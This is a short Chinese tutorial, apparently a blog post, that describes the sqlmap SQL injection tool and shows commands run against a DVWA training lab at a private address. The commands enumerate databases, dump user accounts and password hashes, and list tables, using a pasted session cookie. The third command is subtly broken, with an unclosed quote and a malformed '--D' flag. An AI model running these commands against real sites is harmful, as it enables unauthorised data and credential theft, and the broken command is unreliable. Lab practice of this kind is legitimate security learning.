简介
SQLMAP是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任意命令。
SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点:
1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。
2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。
3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。
4、支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列
5、支持自动识别密码哈希格式并通过字典破解密码哈希。
6、支持完全地下载某个数据库中的某个表、也可以只下载某个表中的某几列。
7、支持在数据库管理系统中搜索指定的数据库名、表名和列名
8、当数据库管理系统是MySQL、PostgreSQL或者MSSQL时支持下载或上传文件。
9、当数据库管理系统是MySQL、PostgreSQL或者MSSQL时支持执行任意命令并回显标准输出。
下载
官网:https://sqlmap.org/
或者kali里
使用
sqlmap -u "http://192.168.11.129/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=afir24o2bp9b866nqld0k41t3t; security=low" --batch --dbs
命令复制里面就是干
成功查询到数据表
查看用户名密码
sqlmap -u "http://192.168.11.129/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=afir24o2bp9b866nqld0k41t3t; security=low" --batch --users --passwords
查看某数据库中的所有表
sqlmap -u "http://192.168.11.129/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=afir24o2bp9b866nqld0k41t3t; --batch --D dvwa --tables
评论已关闭